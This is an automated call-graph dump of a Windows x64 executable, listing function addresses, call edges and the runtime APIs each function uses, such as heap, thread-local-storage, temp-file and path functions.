14000612a 8452 140012450 4 API calls 8446->8452 8447->8426 8447->8427 8447->8443 8453 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8447->8453 8447->8454 8448 1400121c0 GetLastError TlsGetValue SetLastError 8448->8467 8449 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8449->8471 8450 140007c90 3 API calls 8476 140005f5d 8450->8476 8451 1400121c0 GetLastError TlsGetValue SetLastError 8480 14000603b 8451->8480 8455 140006139 8452->8455 8453->8447 8454->8428 8454->8430 8454->8433 8454->8444 8454->8461 8460 140012450 4 API calls 8455->8460 8456 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8456->8461 8457 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8457->8467 8458 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8458->8476 8459 140007c90 3 API calls 8459->8480 8462 14000614b 8460->8462 8461->8429 8461->8456 8463 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8461->8463 8461->8467 8992 140007c90 8461->8992 8466 140012210 3 API calls 8462->8466 8463->8461 8464 1400121c0 GetLastError TlsGetValue SetLastError 8464->8476 8465 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8465->8480 8468 14000615c 8466->8468 8467->8436 8467->8445 8467->8448 8467->8457 8467->8471 8996 1400121c0 GetLastError TlsGetValue SetLastError 8468->8996 8469 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8469->8471 8471->8437 8471->8440 8471->8449 8471->8469 8471->8476 8472 140006166 8997 1400121c0 GetLastError TlsGetValue SetLastError 8472->8997 8473 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8473->8476 8474 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8474->8480 8476->8450 8476->8458 8476->8464 8476->8473 8476->8480 8477 140006176 8998 1400047e2 8477->8998 8480->8438 8480->8451 8480->8459 8480->8465 8480->8474 8481 140012210 3 API calls 8482 14000619e 8481->8482 8483 14000c2bc 16 API calls 8482->8483 8484 1400061a3 GetModuleHandleW 8483->8484 9025 1400121c0 GetLastError TlsGetValue SetLastError 8484->9025 8486 1400061c4 9026 1400121c0 GetLastError TlsGetValue SetLastError 8486->9026 8488 1400061d8 9027 1400121c0 GetLastError TlsGetValue SetLastError 8488->9027 8490 1400061e8 9028 1400121c0 GetLastError TlsGetValue SetLastError 8490->9028 8492 1400061f8 8493 140010ba0 6 API calls 8492->8493 8494 140006216 8493->8494 9029 1400125d0 TlsGetValue 8494->9029 8496 140006220 8497 140007dc0 6 API calls 8496->8497 8498 140006233 8497->8498 8499 140012210 3 API calls 8498->8499 8500 140006245 8499->8500 9030 1400121c0 GetLastError TlsGetValue SetLastError 8500->9030 8502 14000624f 9031 1400121c0 GetLastError TlsGetValue SetLastError 8502->9031 8504 140006263 9032 1400121c0 GetLastError TlsGetValue SetLastError 8504->9032 8506 140006273 9033 1400121c0 GetLastError TlsGetValue SetLastError 8506->9033 8508 140006283 8509 140010ba0 6 API calls 8508->8509 8510 1400062a2 8509->8510 9034 1400125d0 TlsGetValue 8510->9034 8512 1400062ac 8513 140007dc0 6 API calls 8512->8513 8514 1400062bf 8513->8514 8515 140012210 3 API calls 8514->8515 8516 1400062d1 8515->8516 9035 140004134 8516->9035 8520 1400062ed 9045 1400121c0 GetLastError TlsGetValue SetLastError 8520->9045 8522 1400062fd 9046 140002c46 8522->9046 8524 140006314 9162 140001e57 8524->9162 8530 140006344 9252 1400121c0 GetLastError TlsGetValue SetLastError 8530->9252 8532 140006354 9253 1400049ea 8532->9253 8535 140012210 3 API calls 8536 1400063a0 PathRemoveBackslashW 8535->8536 8537 1400063b9 8536->8537 9381 1400121c0 GetLastError TlsGetValue SetLastError 8537->9381 8539 1400063c3 9382 1400121c0 GetLastError TlsGetValue SetLastError 8539->9382 8541 1400063d7 9383 1400121c0 GetLastError TlsGetValue SetLastError 8541->9383 8543 1400063e7 9384 140003cc9 8543->9384 8547 140006406 9408 1400125d0 TlsGetValue 8547->9408 8549 140006410 9409 14000c45c 8549->9409 8551 140006424 9412 1400121c0 GetLastError TlsGetValue SetLastError 8551->9412 8553 140006449 8554 140012450 4 API calls 8553->8554 8555 140006458 8554->8555 8556 140012450 4 API calls 8555->8556 8557 14000646c 8556->8557 8558 140012210 3 API calls 8557->8558 8559 14000647d 8558->8559 9413 1400121c0 GetLastError TlsGetValue SetLastError 8559->9413 8561 140006487 9414 1400121c0 GetLastError TlsGetValue SetLastError 8561->9414 8563 140006497 9415 1400026bb 8563->9415 8566 140012210 3 API calls 8567 1400064c0 8566->8567 9461 140004ee2 8567->9461 8571 1400064d6 8572 140012450 4 API calls 8571->8572 8573 1400064e5 8572->8573 8574 140012210 3 API calls 8573->8574 8575 1400064f7 PathQuoteSpacesW 8574->8575 9665 1400121c0 GetLastError TlsGetValue SetLastError 8575->9665 8577 140006516 8578 140012450 4 API calls 8577->8578 8579 140006525 8578->8579 8580 140012450 4 API calls 8579->8580 8581 14000653c 8580->8581 8582 140012450 4 API calls 8581->8582 8583 140006551 8582->8583 8584 140012210 3 API calls 8583->8584 8585 140006563 PathQuoteSpacesW 8584->8585 8586 1400065a1 8585->8586 8587 14000657d 8585->8587 9727 140003ddc 8586->9727 9717 140007284 CreateThread 8587->9717 8591 1400065ab 9666 1400121c0 GetLastError TlsGetValue SetLastError 8591->9666 8593 1400065b5 9667 1400121c0 GetLastError TlsGetValue SetLastError 8593->9667 8595 1400065ce 8596 140012450 4 API calls 8595->8596 8597 1400065dd 8596->8597 8598 140012450 4 API calls 8597->8598 8599 1400065f4 8598->8599 8600 140012450 4 API calls 8599->8600 8601 140006609 8600->8601 9668 140012520 TlsGetValue 8601->9668 8603 140006612 9669 1400121c0 GetLastError TlsGetValue SetLastError 8603->9669 8605 14000661c 9670 1400121c0 GetLastError TlsGetValue SetLastError 8605->9670 8607 14000662c 9671 14000daa8 8607->9671 8611 140006645 9678 1400121c0 GetLastError TlsGetValue SetLastError 8611->9678 8613 140006657 8614 140012450 4 API calls 8613->8614 8615 140006666 8614->8615 8616 140012450 4 API calls 8615->8616 8617 140006678 8616->8617 9679 1400125d0 TlsGetValue 8617->9679 8619 140006682 9680 1400125d0 TlsGetValue 8619->9680 8621 140006690 9681 1400125d0 TlsGetValue 8621->9681 8623 14000669f 9682 1400029c8 8623->9682 8650 1400123e0 21 API calls 8649->8650 8651 140004351 8650->8651 10622 1400121c0 GetLastError TlsGetValue SetLastError 8651->10622 8653 14000435b 10623 1400121c0 GetLastError TlsGetValue SetLastError 8653->10623 8655 14000436f 10624 1400121c0 GetLastError TlsGetValue SetLastError 8655->10624 8657 14000437f 10625 1400121c0 GetLastError TlsGetValue SetLastError 8657->10625 8659 14000438f 8660 140010ba0 6 API calls 8659->8660 8661 1400043ad 8660->8661 10626 1400125d0 TlsGetValue 8661->10626 8663 1400043b7 8664 140007dc0 6 API calls 8663->8664 8665 1400043ca 8664->8665 8666 140012210 3 API calls 8665->8666 8667 1400043d9 8666->8667 10627 1400121c0 GetLastError TlsGetValue SetLastError 8667->10627 8669 1400043e3 10628 1400121c0 GetLastError TlsGetValue SetLastError 8669->10628 8671 1400043f7 10629 1400121c0 GetLastError TlsGetValue SetLastError 8671->10629 8673 140004407 10630 1400121c0 GetLastError TlsGetValue SetLastError 8673->10630 8675 140004417 8676 140010ba0 6 API calls 8675->8676 8677 140004433 8676->8677 10631 1400125d0 TlsGetValue 8677->10631 8679 14000443d 8680 140007dc0 6 API calls 8679->8680 8681 140004450 8680->8681 8682 140012210 3 API calls 8681->8682 8683 14000445f 8682->8683 8684 140004134 24 API calls 8683->8684 8685 140004469 8684->8685 10632 1400121c0 GetLastError TlsGetValue SetLastError 8685->10632 8687 140004478 10633 1400121c0 GetLastError TlsGetValue SetLastError 8687->10633 8689 140004488 8690 140002c46 110 API calls 8689->8690 8691 14000449c 8690->8691 10634 1400121c0 GetLastError TlsGetValue SetLastError 8691->10634 8693 1400044ba 10635 1400121c0 GetLastError TlsGetValue SetLastError 8693->10635 8695 1400044ce 8696 14000bc94 24 API calls 8695->8696 8697 1400044f2 8696->8697 8698 140012210 3 API calls 8697->8698 8699 140004501 8698->8699 8700 1400124c0 wcscmp 8699->8700 8701 14000450e 8700->8701 8702 140004779 8701->8702 10636 1400121c0 GetLastError TlsGetValue SetLastError 8701->10636 8702->8702 8704 140004521 10637 1400121c0 GetLastError TlsGetValue SetLastError 8704->10637 8706 140004535 10638 1400121c0 GetLastError TlsGetValue SetLastError 8706->10638 8708 140004545 10639 1400121c0 GetLastError TlsGetValue SetLastError 8708->10639 8710 140004555 8711 140010ba0 6 API calls 8710->8711 8712 140004573 8711->8712 10640 1400125d0 TlsGetValue 8712->10640 8714 14000457d 8715 140007dc0 6 API calls 8714->8715 8716 140004590 8715->8716 8717 140012210 3 API calls 8716->8717 8718 14000459f 8717->8718 10641 1400121c0 GetLastError TlsGetValue SetLastError 8718->10641 8720 1400045a9 10642 1400121c0 GetLastError TlsGetValue SetLastError 8720->10642 8722 1400045bd 10643 1400121c0 GetLastError TlsGetValue SetLastError 8722->10643 8724 1400045cd 10644 1400121c0 GetLastError TlsGetValue SetLastError 8724->10644 8726 1400045dd 8727 140010ba0 6 API calls 8726->8727 8728 1400045fb 8727->8728 10645 1400125d0 TlsGetValue 8728->10645 8730 140004605 8731 140007dc0 6 API calls 8730->8731 8732 140004618 8731->8732 8733 140012210 3 API calls 8732->8733 8734 140004627 8733->8734 10646 1400121c0 GetLastError TlsGetValue SetLastError 8734->10646 8736 140004631 10647 1400121c0 GetLastError TlsGetValue SetLastError 8736->10647 8738 140004641 8739 140005794 69 API calls 8738->8739 8740 14000465b 8739->8740 8741 140012210 3 API calls 8740->8741 8742 14000466c 8741->8742 10648 1400121c0 GetLastError TlsGetValue SetLastError 8742->10648 8744 140004676 10649 1400121c0 GetLastError TlsGetValue SetLastError 8744->10649 8746 140004686 8747 140005794 69 API calls 8746->8747 8748 1400046a0 8747->8748 8749 140012210 3 API calls 8748->8749 8750 1400046af PathAddBackslashW 8749->8750 10650 1400121c0 GetLastError TlsGetValue SetLastError 8750->10650 8752 1400046c3 10651 1400121c0 GetLastError TlsGetValue SetLastError 8752->10651 8754 1400046e0 8755 140012450 4 API calls 8754->8755 8756 1400046ef 8755->8756 8757 140012450 4 API calls 8756->8757 8758 140004703 8757->8758 10652 1400125d0 TlsGetValue 8758->10652 8760 14000470d 8761 14000309a 14 API calls 8760->8761 8762 140004720 8761->8762 10653 1400121c0 GetLastError TlsGetValue SetLastError 8762->10653 8764 140004743 8765 140012450 4 API calls 8764->8765 8766 140004752 8765->8766 8767 140012210 3 API calls 8766->8767 8768 140004763 PathRemoveBackslashW 8767->8768 8769 140003ddc 114 API calls 8768->8769 8769->8702 8770->8236 8771->8239 8773 14000cd04 RtlAllocateHeap 8772->8773 8774 14000ce39 8772->8774 8773->8252 8773->8253 8796 14000d140 8774->8796 8776 14000ce4b 8803 140011968 8776->8803 8779 14000ce83 HeapFree 8779->8779 8780 14000ce9d HeapFree 8779->8780 8780->8773 8782 14001182b 8781->8782 8783 140011903 RtlAllocateHeap 8782->8783 8784 14001183b 8782->8784 8785 14000cd9e RtlAllocateHeap 8783->8785 8786 140011920 8783->8786 8840 140011ab8 LoadLibraryW 8784->8840 8785->8253 8786->8785 8788 140011947 RtlInitializeCriticalSection 8786->8788 8788->8785 8790 140011883 RtlAllocateHeap 8792 1400118f4 RtlLeaveCriticalSection 8790->8792 8793 14001189e 8790->8793 8791 140011862 8791->8790 8791->8792 8792->8785 8794 1400117fc 4 API calls 8793->8794 8795 1400118b7 8794->8795 8795->8792 8797 14000d15b 8796->8797 8798 14000d1b4 memset 8797->8798 8799 14000d163 HeapFree 8797->8799 8816 140016bb0 8797->8816 8821 1400116f4 8797->8821 8800 14000d1d0 8798->8800 8799->8797 8800->8776 8804 1400119fc 8803->8804 8805 14001197e RtlEnterCriticalSection 8803->8805 8831 140011668 8804->8831 8806 14001199c 8805->8806 8807 1400119ed RtlLeaveCriticalSection 8805->8807 8809 140011968 4 API calls 8806->8809 8810 14000ce54 HeapFree HeapFree 8807->8810 8814 1400119a9 HeapFree 8809->8814 8810->8779 8810->8780 8812 140011a11 HeapFree 8812->8810 8813 140011a07 RtlDeleteCriticalSection 8813->8812 8814->8807 8819 140016bca 8816->8819 8817 140016ced 8817->8797 8818 140016bb0 HeapFree 8818->8819 8819->8817 8819->8818 8828 140012360 8819->8828 8822 14001170a RtlEnterCriticalSection 8821->8822 8826 140011714 8821->8826 8822->8826 8823 1400117f1 8823->8797 8824 1400117e7 RtlLeaveCriticalSection 8824->8823 8825 140011794 8825->8823 8825->8824 8826->8825 8827 14001177b HeapFree 8826->8827 8827->8825 8829 140012371 HeapFree 8828->8829 8830 140012385 8828->8830 8829->8830 8830->8819 8832 140011685 8831->8832 8833 14001167b RtlEnterCriticalSection 8831->8833 8834 1400116a8 8832->8834 8835 14001168e HeapFree 8832->8835 8833->8832 8836 1400116ca 8834->8836 8837 1400116b0 HeapFree 8834->8837 8835->8834 8835->8835 8838 1400116e8 8836->8838 8839 1400116de RtlLeaveCriticalSection 8836->8839 8837->8836 8837->8837 8838->8812 8838->8813 8839->8838 8841 140011aeb GetProcAddress 8840->8841 8845 140011b24 8840->8845 8842 140011b17 FreeLibrary 8841->8842 8843 140011b00 8841->8843 8844 14001184e RtlEnterCriticalSection 8842->8844 8842->8845 8843->8842 8844->8791 8845->8844 8846 140011b38 Sleep 8845->8846 8846->8845 8848 14000d656 8847->8848 8850 14000d62f 8847->8850 8849 14000d53f 8848->8849 8851 1400116f4 3 API calls 8848->8851 8849->8263 8850->8849 8852 140016bb0 HeapFree 8850->8852 8853 1400116f4 3 API calls 8850->8853 8851->8848 8852->8850 8853->8850 8855 140011d69 8854->8855 8856 140011ef9 8854->8856 8855->8277 8855->8278 8857 140011f38 HeapFree 8856->8857 8858 140016bb0 HeapFree 8856->8858 8857->8855 8858->8856 8860 1400123ed 8859->8860 8861 14001240f TlsGetValue 8859->8861 8862 140012060 5 API calls 8860->8862 8863 14001240d 8861->8863 8864 140012420 8861->8864 8865 1400123f2 TlsGetValue 8862->8865 8863->8290 8898 140012c50 RtlAllocateHeap RtlAllocateHeap TlsSetValue 8864->8898 8889 140016fb4 8865->8889 8868 140012425 TlsGetValue 8869 140016fb4 13 API calls 8868->8869 8869->8863 8870->8292 8871->8294 8872->8296 8873->8298 8899 140010db0 8874->8899 8877 1400125d0 TlsGetValue 8877->8302 8879 140007dde 8878->8879 8913 140012630 TlsGetValue 8879->8913 8882 1400126d0 3 API calls 8883 140007df4 8882->8883 8884 140007e02 8883->8884 8915 140012850 TlsGetValue 8883->8915 8886 14000431d 8884->8886 8887 140007e21 CharUpperW 8884->8887 8888 1400125a0 TlsGetValue 8886->8888 8887->8886 8888->8306 8890 140016fe2 TlsAlloc RtlInitializeCriticalSection 8889->8890 8891 140017001 TlsGetValue 8889->8891 8890->8891 8892 1400170d6 RtlAllocateHeap 8891->8892 8893 140017019 RtlAllocateHeap 8891->8893 8894 1400170ee 8892->8894 8893->8894 8895 140017039 RtlEnterCriticalSection 8893->8895 8894->8863 8896 140017051 7 API calls 8895->8896 8897 14001704e 8895->8897 8896->8892 8897->8896 8898->8868 8900 140010ddc 8899->8900 8903 140010f00 8900->8903 8904 140010f1e 8903->8904 8907 1400126d0 TlsGetValue 8904->8907 8908 1400126f4 8907->8908 8909 140012772 8908->8909 8910 14001272d RtlReAllocateHeap 8908->8910 8911 140004300 8909->8911 8912 140012793 RtlReAllocateHeap 8909->8912 8910->8911 8911->8877 8912->8911 8914 140007de9 8913->8914 8914->8882 8915->8884 8916->8315 8917->8317 8918->8319 8920 1400126d0 3 API calls 8919->8920 8921 14000c0e6 GetModuleFileNameW 8920->8921 8922 14000c10d 8921->8922 8978 140012900 TlsGetValue 8922->8978 8924 14000224b 8925 1400125d0 TlsGetValue 8924->8925 8925->8343 8926->8335 8927->8339 8928->8342 8929->8346 8930->8348 8931->8351 8933 140007d10 8932->8933 8933->8933 8934 140012630 TlsGetValue 8933->8934 8935 140007d22 8934->8935 8936 1400126d0 3 API calls 8935->8936 8938 140007d2d 8936->8938 8937 140002427 8940 1400125d0 TlsGetValue 8937->8940 8938->8937 8979 140012850 TlsGetValue 8938->8979 8940->8355 8943 140010bb0 8941->8943 8942 140010c34 8944 140010f00 3 API calls 8942->8944 8943->8942 8946 140010c04 8943->8946 8945 140002446 8944->8945 8949 1400125d0 TlsGetValue 8945->8949 8980 140017140 8946->8980 8948 140010c0c 8948->8942 8949->8359 8950->8365 8952 140012477 8951->8952 8953 140012469 wcslen 8951->8953 8954 1400126d0 3 API calls 8952->8954 8953->8952 8955 140012485 8954->8955 8955->8367 8956->8371 8957->8373 8958->8375 8959->8377 8960->8381 8961->8387 8962->8389 8964 140007e75 8963->8964 8965 140012630 TlsGetValue 8964->8965 8966 140007e8e 8965->8966 8967 1400126d0 3 API calls 8966->8967 8968 140007e9a 8967->8968 8970 140007eaa 8968->8970 8986 140012850 TlsGetValue 8968->8986 8970->8391 8972 1400124d6 wcscmp 8971->8972 8974 14000257d 8972->8974 8974->8398 8975 14000c2bc 8974->8975 8987 140011044 TlsGetValue 8975->8987 8978->8924 8979->8937 8981 140017166 WideCharToMultiByte 8980->8981 8984 1400171f2 8980->8984 8983 1400171ae malloc 8981->8983 8981->8984 8983->8984 8985 1400171bf WideCharToMultiByte 8983->8985 8984->8948 8985->8984 8986->8970 8988 14000c2cc 8987->8988 8989 14001106a RtlAllocateHeap TlsSetValue 8987->8989 8990 14001109c 8989->8990 8991 140016fb4 13 API calls 8990->8991 8991->8988 8993 1400126d0 3 API calls 8992->8993 8994 140007ca2 8993->8994 8994->8461 8995->8446 8996->8472 8997->8477 8999 1400123e0 21 API calls 8998->8999 9000 1400047fc 8999->9000 9789 1400122f0 9000->9789 9002 140004819 9003 1400122f0 2 API calls 9002->9003 9004 140004830 9003->9004 9792 1400121c0 GetLastError TlsGetValue SetLastError 9004->9792 9006 14000483e 9793 1400121c0 GetLastError TlsGetValue SetLastError 9006->9793 9008 140004852 9794 140008170 9008->9794 9011 140012210 3 API calls 9012 140004877 9011->9012 9797 1400121c0 GetLastError TlsGetValue SetLastError 9012->9797 9014 1400048a0 9015 140012450 4 API calls 9014->9015 9016 1400048af 9015->9016 9798 1400125a0 TlsGetValue 9016->9798 9018 1400048ba 9019 140012360 HeapFree 9018->9019 9020 1400048d9 9019->9020 9021 140012360 HeapFree 9020->9021 9022 1400048eb 9021->9022 9023 140012360 HeapFree 9022->9023 9024 1400048fd 9023->9024 9024->8481 9025->8486 9026->8488 9027->8490 9028->8492 9029->8496 9030->8502 9031->8504 9032->8506 9033->8508 9034->8512 9036 1400123e0 21 API calls 9035->9036 9037 14000414b 9036->9037 9038 1400122f0 2 API calls 9037->9038 9039 14000415e 9038->9039 9041 140004198 9039->9041 9799 14000350f 9039->9799 9042 140012360 HeapFree 9041->9042 9043 140004207 9042->9043 9044 1400121c0 GetLastError TlsGetValue SetLastError 9043->9044 9044->8520 9045->8522 9047 1400123e0 21 API calls 9046->9047 9048 140002c5e 9047->9048 9049 140002c8b 9048->9049 9050 140003010 9048->9050 9804 1400121c0 GetLastError TlsGetValue SetLastError 9049->9804 9802 1400121c0 GetLastError TlsGetValue SetLastError 9050->9802 9053 140002c95 9805 1400121c0 GetLastError TlsGetValue SetLastError 9053->9805 9054 14000301f 9056 140012450 4 API calls 9054->9056 9057 14000302e 9056->9057 9803 1400125a0 TlsGetValue 9057->9803 9058 140002ca9 9806 1400121c0 GetLastError TlsGetValue SetLastError 9058->9806 9061 140003039 9064 140012360 HeapFree 9061->9064 9062 140002cb9 9807 1400121c0 GetLastError TlsGetValue SetLastError 9062->9807 9067 140003058 9064->9067 9065 140002cc9 9808 14000ca80 9065->9808 9069 140012360 HeapFree 9067->9069 9068 140002cf1 9819 1400125d0 TlsGetValue 9068->9819 9071 14000306a 9069->9071 9073 140012360 HeapFree 9071->9073 9072 140002cfb 9820 140007ef0 9072->9820 9075 14000307c 9073->9075 9077 140012360 HeapFree 9075->9077 9079 14000308e 9077->9079 9078 140012210 3 API calls 9080 140002d1d 9078->9080 9079->8524 9828 1400121c0 GetLastError TlsGetValue SetLastError 9080->9828 9082 140002d27 9829 1400121c0 GetLastError TlsGetValue SetLastError 9082->9829 9084 140002d3b 9830 1400121c0 GetLastError TlsGetValue SetLastError 9084->9830 9086 140002d4b 9831 1400121c0 GetLastError TlsGetValue SetLastError 9086->9831 9088 140002d5b 9089 14000ca80 5 API calls 9088->9089 9090 140002d86 9089->9090 9832 1400125d0 TlsGetValue 9090->9832 9092 140002d90 9093 140007ef0 5 API calls 9092->9093 9094 140002da3 9093->9094 9095 140012210 3 API calls 9094->9095 9096 140002db2 9095->9096 9833 1400121c0 GetLastError TlsGetValue SetLastError 9096->9833 9098 140002dbc 9834 1400121c0 GetLastError TlsGetValue SetLastError 9098->9834 9100 140002dcc 9835 1400121c0 GetLastError TlsGetValue SetLastError 9100->9835 9102 140002dec 9836 1400121c0 GetLastError TlsGetValue SetLastError 9102->9836 9104 140002e00 9837 1400074e0 9104->9837 9106 140002e24 9852 140012520 TlsGetValue 9106->9852 9108 140002e2d 9853 1400121c0 GetLastError TlsGetValue SetLastError 9108->9853 9110 140002e37 9854 1400121c0 GetLastError TlsGetValue SetLastError 9110->9854 9112 140002e47 9113 1400074e0 9 API calls 9112->9113 9114 140002e6b 9113->9114 9855 1400125d0 TlsGetValue 9114->9855 9116 140002e75 9856 1400125d0 TlsGetValue 9116->9856 9118 140002e83 9857 14000b758 9118->9857 9121 140012210 3 API calls 9122 140002eaa 9121->9122 9123 1400124c0 wcscmp 9122->9123 9124 140002eb7 9123->9124 9125 140003005 9124->9125 9126 140002ec0 9124->9126 9128 140002930 35 API calls 9125->9128 9897 1400121c0 GetLastError TlsGetValue SetLastError 9126->9897 9128->9050 9129 140002eca 9898 1400121c0 GetLastError TlsGetValue SetLastError 9129->9898 9131 140002ede 9899 1400121c0 GetLastError TlsGetValue SetLastError 9131->9899 9133 140002ef3 9900 1400121c0 GetLastError TlsGetValue SetLastError 9133->9900 9135 140002f07 9136 140007ef0 5 API calls 9135->9136 9137 140002f1c 9136->9137 9901 1400125d0 TlsGetValue 9137->9901 9139 140002f26 9140 140010ba0 6 API calls 9139->9140 9141 140002f3b 9140->9141 9142 140012210 3 API calls 9141->9142 9143 140002f4a 9142->9143 9144 1400124c0 wcscmp 9143->9144 9145 140002f59 9144->9145 9146 140003003 9145->9146 9902 1400121c0 GetLastError TlsGetValue SetLastError 9145->9902 9146->9050 9148 140002f6c 9903 1400121c0 GetLastError TlsGetValue SetLastError 9148->9903 9150 140002f85 9904 1400121c0 GetLastError TlsGetValue SetLastError 9150->9904 9152 140002f95 9153 1400074e0 9 API calls 9152->9153 9154 140002fb9 9153->9154 9905 140012520 TlsGetValue 9154->9905 9156 140002fc2 9906 1400125d0 TlsGetValue 9156->9906 9158 140002fce 9907 14000b574 9158->9907 9160 140002fe4 9161 140002930 35 API calls 9160->9161 9161->9146 9163 140001e60 9162->9163 9163->9163 9164 1400123e0 21 API calls 9163->9164 9167 140001e7a 9164->9167 9165 140001f54 9939 1400121c0 GetLastError TlsGetValue SetLastError 9165->9939 9166 1400121c0 GetLastError TlsGetValue SetLastError 9166->9167 9167->9165 9167->9166 9170 140007c90 3 API calls 9167->9170 9177 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 9167->9177 9182 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9167->9182 9169 140001f6e 9940 1400121c0 GetLastError TlsGetValue SetLastError 9169->9940 9170->9167 9172 140001f82 9941 14000d9c4 9172->9941 9175 140012210 3 API calls 9176 140001fa1 GetTempFileNameW 9175->9176 9950 1400121c0 GetLastError TlsGetValue SetLastError 9176->9950 9177->9167 9179 140001fce 9951 1400121c0 GetLastError TlsGetValue SetLastError 9179->9951 9181 140001fe2 9952 14000ca00 9181->9952 9182->9167 9185 140012210 3 API calls 9186 140002008 9185->9186 9958 14000da6c 9186->9958 9192 14000204f 9969 1400121c0 GetLastError TlsGetValue SetLastError 9192->9969 9194 140002063 9195 14000ca00 4 API calls 9194->9195 9196 140002078 9195->9196 9197 140012210 3 API calls 9196->9197 9198 140002089 9197->9198 9199 14000da6c 2 API calls 9198->9199 9200 140002095 9199->9200 9201 14000d914 3 API calls 9200->9201 9202 1400020a1 GetTempFileNameW PathAddBackslashW 9201->9202 9970 1400121c0 GetLastError TlsGetValue SetLastError 9202->9970 9204 1400020dc 9971 1400121c0 GetLastError TlsGetValue SetLastError 9204->9971 9206 1400020f0 9207 14000ca00 4 API calls 9206->9207 9208 140002105 9207->9208 9209 140012210 3 API calls 9208->9209 9210 140002116 9209->9210 9211 14000da6c 2 API calls 9210->9211 9212 140002122 PathRenameExtensionW GetTempFileNameW 9211->9212 9972 1400121c0 GetLastError TlsGetValue SetLastError 9212->9972 9214 140002162 9973 1400121c0 GetLastError TlsGetValue SetLastError 9214->9973 9216 140002176 9217 14000ca00 4 API calls 9216->9217 9218 14000218b 9217->9218 9219 140012210 3 API calls 9218->9219 9220 14000219c 9219->9220 9221 140012360 HeapFree 9220->9221 9222 1400021ba 9221->9222 9223 140012360 HeapFree 9222->9223 9224 1400021cc 9223->9224 9225 140012360 HeapFree 9224->9225 9226 1400021de 9225->9226 9227 1400067aa 9226->9227 9228 1400123e0 21 API calls 9227->9228 9236 1400067c2 9228->9236 9229 14000689c 9975 1400121c0 GetLastError TlsGetValue SetLastError 9229->9975 9231 1400068a6 9976 1400121c0 GetLastError TlsGetValue SetLastError 9231->9976 9232 1400121c0 GetLastError TlsGetValue SetLastError 9232->9236 9234 1400068b6 9238 1400049ea 86 API calls 9234->9238 9235 140007c90 3 API calls 9235->9236 9236->9229 9236->9232 9236->9235 9237 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9236->9237 9242 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 9236->9242 9237->9236 9239 1400068e8 9238->9239 9240 140012210 3 API calls 9239->9240 9241 1400068f7 9240->9241 9977 14000dc88 9241->9977 9242->9236 9245 140012360 HeapFree 9246 140006913 9245->9246 9247 140012360 HeapFree 9246->9247 9248 140006925 9247->9248 9249 140012360 HeapFree 9248->9249 9250 14000633a 9249->9250 9251 1400121c0 GetLastError TlsGetValue SetLastError 9250->9251 9251->8530 9252->8532 9254 1400123e0 21 API calls 9253->9254 9255 140004a05 9254->9255 9256 1400122f0 2 API calls 9255->9256 9257 140004a22 9256->9257 9258 140004a33 9257->9258 9259 140004a79 9257->9259 9982 1400121c0 GetLastError TlsGetValue SetLastError 9258->9982 9260 140004ac2 9259->9260 9261 140004a86 9259->9261 9264 140004b1b 9260->9264 9265 140004acf 9260->9265 9984 1400121c0 GetLastError TlsGetValue SetLastError 9261->9984 9270 140004b74 9264->9270 9271 140004b28 9264->9271 9985 1400121c0 GetLastError TlsGetValue SetLastError 9265->9985 9266 140004a3d 9983 1400121c0 GetLastError TlsGetValue SetLastError 9266->9983 9269 140004a97 9276 140012450 4 API calls 9269->9276 9274 140004b81 9270->9274 9275 140004bcd 9270->9275 10003 1400121c0 GetLastError TlsGetValue SetLastError 9271->10003 9272 140004ad9 9986 1400121c0 GetLastError TlsGetValue SetLastError 9272->9986 9273 140004a4d 9279 14000daa8 5 API calls 9273->9279 10005 1400121c0 GetLastError TlsGetValue SetLastError 9274->10005 9283 140004c26 9275->9283 9284 140004bda 9275->9284 9281 140004aa6 9276->9281 9286 140004a5d 9279->9286 9290 140012210 3 API calls 9281->9290 9282 140004b32 10004 1400121c0 GetLastError TlsGetValue SetLastError 9282->10004 9288 140004c33 9283->9288 9289 140004c7f 9283->9289 10007 1400121c0 GetLastError TlsGetValue SetLastError 9284->10007 9285 140004ae9 9987 14000db18 9285->9987 9296 140012210 3 API calls 9286->9296 9287 140004b8b 10006 1400121c0 GetLastError TlsGetValue SetLastError 9287->10006 10009 1400121c0 GetLastError TlsGetValue SetLastError 9288->10009 9293 140004cd8 9289->9293 9294 140004c8c 9289->9294 9299 140004a70 9290->9299 9307 140004d31 9293->9307 9308 140004ce5 9293->9308 10011 1400121c0 GetLastError TlsGetValue SetLastError 9294->10011 9296->9299 9980 1400121c0 GetLastError TlsGetValue SetLastError 9299->9980 9300 140004b42 9309 14000db18 17 API calls 9300->9309 9301 140004be4 10008 1400121c0 GetLastError TlsGetValue SetLastError 9301->10008 9305 140004b9b 9315 14000db18 17 API calls 9305->9315 9306 140004c3d 10010 1400121c0 GetLastError TlsGetValue SetLastError 9306->10010 9312 140004d8a 9307->9312 9313 140004d3e 9307->9313 10013 1400121c0 GetLastError TlsGetValue SetLastError 9308->10013 9319 140004b58 9309->9319 9310 140004bf4 9321 14000db18 17 API calls 9310->9321 9311 140004c96 10012 1400121c0 GetLastError TlsGetValue SetLastError 9311->10012 9328 140004e3a 9312->9328 9329 140004d9b 9312->9329 10015 1400121c0 GetLastError TlsGetValue SetLastError 9313->10015 9314 140012210 3 API calls 9380 140004b12 9314->9380 9324 140004bb1 9315->9324 9320 140012210 3 API calls 9319->9320 9320->9380 9332 140004c0a 9321->9332 9335 140012210 3 API calls 9324->9335 9325 140004c4d 9336 14000db18 17 API calls 9325->9336 9326 140004e8b 9337 140012450 4 API calls 9326->9337 9327 140004cef 10014 1400121c0 GetLastError TlsGetValue SetLastError 9327->10014 10043 1400121c0 GetLastError TlsGetValue SetLastError 9328->10043 10017 1400121c0 GetLastError TlsGetValue SetLastError 9329->10017 9341 140012210 3 API calls 